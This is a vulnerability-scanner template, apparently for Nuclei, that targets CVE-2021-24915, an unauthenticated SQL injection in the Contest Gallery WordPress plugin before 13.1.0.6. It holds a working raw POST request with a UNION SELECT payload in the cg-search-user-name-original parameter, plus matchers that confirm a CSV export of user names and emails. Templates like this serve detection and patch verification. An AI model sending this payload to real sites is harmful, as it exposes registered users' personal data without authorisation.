2023-10-17 07:20:28 +00:00
id : CVE-2021-24915
info :
name : Contest Gallery < 13.1.0.6 - SQL injection
author : r3Y3r53
severity : critical
description : |
The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.
remediation : Fixed in version 13.1.0.6
reference :
- https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac
- https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917
- https://wordpress.org/plugins/contest-gallery/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2021-24915
cwe-id : CWE-89
2023-11-14 14:37:18 +00:00
epss-score : 0.19661
2023-11-18 12:52:17 +00:00
epss-percentile : 0.95796
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 1
vendor : contest_gallery
product : contest_gallery
framework : wordpress
2023-10-17 07:20:28 +00:00
public-query : "/wp-content/plugins/contest-gallery/"
tags : cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery
http :
- raw :
- |
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'WpUserId'
- 'Username'
- 'Usermail'
condition : and
- type : word
part : header
words :
- 'text/csv'
- 'filename='
condition : and
- type : status
status :
- 200
2023-11-18 15:30:06 +00:00
# digest: 490a0046304402202270873d1f6782eefa37730a7bc43a5fc8fb1f4f5717339707e4a71f86d7b681022057a491a982ce936166d8d7a1ed9d1190869b0ecbe34c2510a9db76afc0acc682:922c64590222798bb761d5b6d8e72950